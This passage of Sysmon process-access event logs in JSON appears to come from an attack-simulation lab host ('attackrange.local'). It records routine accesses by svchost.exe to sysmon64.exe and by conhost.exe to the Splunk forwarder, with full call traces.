06:58:56.615","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6674,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:56.615\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:56.615","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6675,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:56.615\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:56.615","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6676,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:56.615\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:56.615","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6677,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:56.615\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:56.615","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6678,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:56.615\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:56.615","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6679,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:56.615\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:56.615","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6680,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:56.615\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:56.615","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:58:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6681,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:56.615\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-12B0-5F25-0000-0010AF6C0900}\r\nTargetProcessId: 3844\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:56.615","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-12B0-5F25-0000-0010AF6C0900}","TargetProcessId":"3844","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 